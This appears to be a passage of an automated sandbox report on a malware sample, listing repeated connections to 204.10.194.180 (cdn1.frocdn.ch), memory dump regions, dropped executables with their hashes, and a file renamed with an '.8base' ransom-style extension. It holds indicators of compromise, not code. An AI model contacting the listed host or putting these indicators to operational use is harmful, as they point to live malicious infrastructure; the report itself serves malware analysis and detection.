NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 61.255.232.213.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp

Files

memory/1592-0-0x0000000000C50000-0x0000000000E36000-memory.dmp

memory/1592-1-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/1592-2-0x0000000005900000-0x0000000005978000-memory.dmp

memory/1592-3-0x0000000005A50000-0x0000000005A60000-memory.dmp

memory/1592-4-0x0000000005980000-0x00000000059E8000-memory.dmp

memory/1592-5-0x00000000059F0000-0x0000000005A3C000-memory.dmp

memory/1592-6-0x0000000006040000-0x00000000065E4000-memory.dmp

memory/444-7-0x0000000000400000-0x0000000000473000-memory.dmp

memory/444-10-0x0000000000400000-0x0000000000473000-memory.dmp

memory/444-11-0x0000000000400000-0x0000000000473000-memory.dmp

memory/1592-12-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/444-13-0x0000000001060000-0x0000000001067000-memory.dmp

memory/444-14-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/444-16-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/444-15-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/444-17-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/3896-18-0x000001BE533F0000-0x000001BE533F3000-memory.dmp

memory/444-19-0x0000000003B40000-0x0000000003B76000-memory.dmp

memory/444-23-0x0000000000400000-0x0000000000473000-memory.dmp

memory/444-26-0x0000000003B40000-0x0000000003B76000-memory.dmp

memory/444-27-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/444-28-0x0000000000400000-0x0000000000473000-memory.dmp

memory/444-29-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/3896-30-0x000001BE533F0000-0x000001BE533F3000-memory.dmp

memory/3896-31-0x000001BE53590000-0x000001BE53597000-memory.dmp

memory/3896-32-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-33-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-34-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-35-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-36-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-38-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-40-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-41-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-42-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-43-0x00007FF876AB0000-0x00007FF876CA5000-memory.dmp

memory/3896-44-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-45-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-46-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-47-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-48-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

MD5 422418e5fa8fb0f192159bccd8ce327b
SHA1 197daad5b4cf36d20e8f8d63bdaf0ea433f84cc0
SHA256 3b2cc8ba128b5fa362ffb2c91170f06693aa0ecd0aa75712e17edf19a8092966
SHA512 32cab7f3852343a4c8111125b667c91ec6365b59f969c5ec97d7cbbe6fd511cb4ce86b6b00d396499412fd7d8ada4c6019e9d744b18b70676028a52a4d4d7ea0

memory/4796-54-0x00000000004B0000-0x000000000055C000-memory.dmp

memory/3916-57-0x0000000000280000-0x0000000000328000-memory.dmp

memory/4796-58-0x0000000004D20000-0x0000000004D66000-memory.dmp

memory/4796-56-0x0000000074B10000-0x00000000752C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

MD5 422418e5fa8fb0f192159bccd8ce327b
SHA1 197daad5b4cf36d20e8f8d63bdaf0ea433f84cc0
SHA256 3b2cc8ba128b5fa362ffb2c91170f06693aa0ecd0aa75712e17edf19a8092966
SHA512 32cab7f3852343a4c8111125b667c91ec6365b59f969c5ec97d7cbbe6fd511cb4ce86b6b00d396499412fd7d8ada4c6019e9d744b18b70676028a52a4d4d7ea0

memory/4796-60-0x0000000004DF0000-0x0000000004E36000-memory.dmp

memory/3916-59-0x0000000004AF0000-0x0000000004B32000-memory.dmp

memory/3916-64-0x0000000004B30000-0x0000000004B74000-memory.dmp

memory/4796-63-0x0000000004E50000-0x0000000004E84000-memory.dmp

memory/3896-65-0x00007FF876AB0000-0x00007FF876CA5000-memory.dmp

memory/4796-67-0x0000000004D70000-0x0000000004D80000-memory.dmp

memory/3916-66-0x0000000004C20000-0x0000000004C52000-memory.dmp

memory/3916-62-0x0000000004B80000-0x0000000004B90000-memory.dmp

memory/3916-61-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/2772-68-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

MD5 422418e5fa8fb0f192159bccd8ce327b
SHA1 197daad5b4cf36d20e8f8d63bdaf0ea433f84cc0
SHA256 3b2cc8ba128b5fa362ffb2c91170f06693aa0ecd0aa75712e17edf19a8092966
SHA512 32cab7f3852343a4c8111125b667c91ec6365b59f969c5ec97d7cbbe6fd511cb4ce86b6b00d396499412fd7d8ada4c6019e9d744b18b70676028a52a4d4d7ea0

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

memory/3916-76-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/2036-72-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2772-71-0x0000000000400000-0x000000000040B000-memory.dmp

memory/4796-77-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/2036-78-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-79-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\X2MpkYv.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/4184-82-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/4184-83-0x00000000053B0000-0x00000000053C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

memory/4184-88-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/428-89-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3164-90-0x0000000002CD0000-0x0000000002CE6000-memory.dmp

memory/2772-92-0x0000000000400000-0x000000000040B000-memory.dmp

memory/2036-104-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-105-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-108-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-106-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-111-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-126-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-124-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-211-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-113-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[8BE9EB4B-3483].[[email protected]].8base

MD5 60816178dbfc4894a2238a14f4e99355
SHA1 2570b72f2c4f1afb1f6fb49e73e44d6fca41326c
SHA256 77aea9fe2cf39187cfa101d08488ea84ec621532b3edefacf4a7ce5d04722552
SHA512 1f3960fb7d14c4a835b57d537844f8053340ec4d4c38a9e1ab2e5cc50e08e21897b3fe7ed60e499c6ae20329361dc67f0fd1cb8a3d0d0b70a40cd64216f7b20e

memory/2036-236-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-252-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-442-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3896-510-0x000001BE53590000-0x000001BE53595000-memory.dmp

memory/3896-511-0x00007FF876AB0000-0x00007FF876CA5000-memory.dmp

memory/428-822-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B188.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Temp\B188.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Temp\B188.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

memory/3880-2279-0x00000000749F0000-0x00000000751A0000-memory.dmp

